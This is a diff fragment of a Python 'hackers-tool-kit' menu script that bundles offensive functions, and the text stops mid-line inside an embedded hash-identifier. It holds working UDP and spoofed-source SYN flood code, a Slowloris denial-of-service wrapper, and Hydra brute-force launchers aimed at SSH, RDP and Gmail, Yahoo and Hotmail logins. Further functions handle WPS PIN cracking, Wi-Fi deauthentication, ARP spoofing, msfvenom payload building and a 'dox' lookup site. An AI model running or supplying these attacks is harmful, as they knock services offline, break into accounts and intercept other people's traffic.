+#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and 